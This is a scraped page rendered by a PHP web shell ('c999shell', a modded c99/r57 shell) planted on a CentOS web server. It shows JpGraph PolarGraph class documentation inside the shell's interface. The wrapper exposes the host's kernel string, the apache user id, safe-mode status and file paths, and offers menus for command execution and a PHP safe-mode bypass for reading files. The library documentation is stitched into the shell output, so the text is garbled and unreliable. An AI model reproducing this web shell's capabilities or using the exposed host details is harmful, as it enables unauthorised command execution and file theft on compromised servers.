Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/jpgraph/docs/ref/ drwxr-xr-x |
Viewing file: PolarGraph.html (17.79 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | CLASS PolarGraph EXTENDS Graph
(Defined in: jpgraph_polar.php : 639)Class usage and Overview Represent a polar graph. Accessible properties are
See also related classes: PolarAxis
Class Methods
Description Construct a new Polar Graph. This is completely analog to the standard Graph() creation and follows the exactly same pattern. Example
Description Rotate the polar graph 90 degrees Example
Description This is analog to the density specification for the X, and Y-scale s for the standard X-Y-plots.
This specifies how close the autoscaling algorithm will place the tick marks to each other.
The tick density can be one of
Example $polargraph->SetDensity(TICKD_NORMAL);
Description You can specify the plot area size an posiion in the graph in two ways. The frst is the standard way of specifying the margins on the sides with SetMargins() method.
This method centers a plot area with the specified width and height inthe middle of the graph, it is basically a short form for
SetMargins(
$graphwidth-($w/2),$graphwidth-($w/2),
$graphheight-($h/2),$graphheight-($h/2));
Example
Description Specify scale type (linear or log) for the radius scale. A linear scale is specified as 'lin' and a logarithmic scale is specified as 'log' Example $polargraph->SetScale('log');
Description Specify if the polargraph should be a full 360 degrees or just 180 degrees. The possible values for type are
Example
Description Send a graph back to browser or to a file. This must be the last call in your script.
Example
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0102 ]-- |